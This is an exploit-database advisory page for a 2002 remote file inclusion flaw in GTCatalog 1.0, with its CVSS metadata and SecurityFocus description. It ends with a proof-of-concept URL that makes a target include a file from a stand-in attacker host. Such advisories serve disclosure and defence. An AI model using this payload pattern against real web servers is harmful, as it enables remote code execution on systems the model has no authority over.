header-logo
Suggest Exploit
vendor:
GTCatalog
by:
SecurityFocus
8.8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: GTCatalog
Affected Version From: GTCatalog 1.0
Affected Version To: GTCatalog 1.0
Patch Exists: YES
Related CWE: CVE-2002-1390
CPE: o:gtcatalog:gtcatalog:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

GTCatalog Remote File Inclusion Vulnerability

GTCatalog is prone to a remote file inclusion vulnerability due to insufficient sanitization of user-supplied data. An attacker can manipulate URI parameters to include external files on remote servers. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6998/info

GTCatalog is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.

This vulnerability is as a result of insufficient sanitization performed on remote user supplied data.

Under some circumstances, it is possible for remote attackers to manipulate URI parameters to include external files on remote servers. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.target.com/index.php?function=custom&custom=http://www.attacker.com/1.custom.inc

Navigation

Suggest Exploit

Services By CQR